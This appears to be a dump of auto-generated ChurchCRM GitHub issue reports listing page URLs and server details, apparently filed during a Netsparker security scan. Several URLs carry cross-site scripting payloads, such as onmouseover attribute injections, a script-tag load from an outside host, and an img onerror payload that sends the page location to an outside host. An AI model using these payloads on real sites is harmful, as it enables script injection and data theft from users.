Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6416/comments | 0 | 2023-01-25T07:21:26Z | 2023-02-07T08:51:20Z | https://github.com/ChurchCRM/CRM/issues/6416 | 1,556,168,482 | 6,416 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/family?issueDescription=&issueTitle=x%22%20onmouseover%3dnetsparker(0x00AD44)%20x%3d%22&mode=inactive&pageName=%2fv2%2ffamily%3fmode%3dinactive
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6415/comments | 0 | 2023-01-25T07:21:24Z | 2023-02-07T08:51:20Z | https://github.com/ChurchCRM/CRM/issues/6415 | 1,556,168,445 | 6,415 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/EventAttendance.php?x%22%20onmouseover%3dnetsparker(0x00AD11)%20x%3d%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6414/comments | 0 | 2023-01-25T07:21:17Z | 2023-02-07T08:51:19Z | https://github.com/ChurchCRM/CRM/issues/6414 | 1,556,168,291 | 6,414 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PaddleNumList.php?FundRaiserID=
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6413/comments | 0 | 2023-01-25T07:20:46Z | 2023-02-07T08:51:18Z | https://github.com/ChurchCRM/CRM/issues/6413 | 1,556,167,682 | 6,413 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PersonView.php?PersonID=1
Screen Size |600x800
Window Size |720x1259
Page Size |814x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6412/comments | 0 | 2023-01-25T07:20:38Z | 2023-02-07T08:51:18Z | https://github.com/ChurchCRM/CRM/issues/6412 | 1,556,167,556 | 6,412 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PersonView.php?PersonID=1
Screen Size |600x800
Window Size |720x1259
Page Size |814x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6411/comments | 0 | 2023-01-25T07:20:34Z | 2023-02-07T08:51:17Z | https://github.com/ChurchCRM/CRM/issues/6411 | 1,556,167,500 | 6,411 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PersonView.php?PersonID=1
Screen Size |600x800
Window Size |720x1259
Page Size |814x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6410/comments | 0 | 2023-01-25T07:20:31Z | 2023-02-07T08:51:17Z | https://github.com/ChurchCRM/CRM/issues/6410 | 1,556,167,456 | 6,410 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |600x800
Window Size |720x1259
Page Size |1022x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6409/comments | 0 | 2023-01-25T07:20:18Z | 2023-02-07T08:51:16Z | https://github.com/ChurchCRM/CRM/issues/6409 | 1,556,167,290 | 6,409 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/people?familyActiveStatus=inactive&issueDescription=&issueTitle=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2f2xeb4dht-b1auf2oczjfzarzbgnyirmzfrzaczt9kys%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e&pageName=%2fv2%2fpeople%3ffamilyActiveStatus%3dinactive
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6408/comments | 0 | 2023-01-25T07:20:02Z | 2023-02-07T08:51:15Z | https://github.com/ChurchCRM/CRM/issues/6408 | 1,556,167,040 | 6,408 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |600x800
Window Size |720x1259
Page Size |805x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6407/comments | 0 | 2023-01-25T07:19:57Z | 2023-02-07T08:51:15Z | https://github.com/ChurchCRM/CRM/issues/6407 | 1,556,166,982 | 6,407 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/Checkin.php?x%22%20onmouseover%3dnetsparker(0x00ABB8)%20x%3d%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6406/comments | 0 | 2023-01-25T07:19:47Z | 2023-02-07T08:51:14Z | https://github.com/ChurchCRM/CRM/issues/6406 | 1,556,166,843 | 6,406 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/FundRaiserEditor.php?FundRaiserID=%3ciMg%20src%3dN%20onerror%3d%22this.onerror%3d%27%27%3bthis.src%3d%27%2f%2f2xeb4dht-bea__c3skyqfp8h4dnzslyzj1s8hfym%27%2b%27nwi.r87.me%2fr%2f%3f%27%2blocation.href%22%3e
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6405/comments | 0 | 2023-01-25T07:19:31Z | 2023-02-07T08:51:13Z | https://github.com/ChurchCRM/CRM/issues/6405 | 1,556,166,603 | 6,405 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/people?familyActiveStatus=inactive&issueDescription=&issueTitle=hTTp://r87.com/?192.168.200.160/&pageName=%2fv2%2fpeople%3ffamilyActiveStatus%3dinactive
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6404/comments | 0 | 2023-01-25T07:19:20Z | 2023-02-07T08:51:13Z | https://github.com/ChurchCRM/CRM/issues/6404 | 1,556,166,431 | 6,404 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/EventNames.php?x%22%20onmouseover%3dnetsparker(0x00AB54)%20x%3d%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6403/comments | 0 | 2023-01-25T07:19:07Z | 2023-02-07T08:51:12Z | https://github.com/ChurchCRM/CRM/issues/6403 | 1,556,166,277 | 6,403 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/people?%22%2bnetsparker(0x00A2F1)%2b%22=nsextt
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6402/comments | 0 | 2023-01-25T07:18:42Z | 2023-02-07T08:51:11Z | https://github.com/ChurchCRM/CRM/issues/6402 | 1,556,165,893 | 6,402 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/ListEvents.php?x%22%20onmouseover%3dnetsparker(0x00AAF0)%20x%3d%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6401/comments | 0 | 2023-01-25T07:18:33Z | 2023-02-07T08:51:59Z | https://github.com/ChurchCRM/CRM/issues/6401 | 1,556,165,741 | 6,401 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard?pageName=%2fv2%2fdashboard
Screen Size |600x800
Window Size |720x1259
Page Size |805x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6400/comments | 0 | 2023-01-25T07:18:28Z | 2023-02-07T08:51:58Z | https://github.com/ChurchCRM/CRM/issues/6400 | 1,556,165,660 | 6,400 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/FundRaiserEditor.php?FundRaiserID=-1&nsextt=x%22%20onmouseover%3dnetsparker(0x00AA8C)%20x%3d%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6399/comments | 0 | 2023-01-25T07:18:11Z | 2023-02-07T08:51:58Z | https://github.com/ChurchCRM/CRM/issues/6399 | 1,556,165,410 | 6,399 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.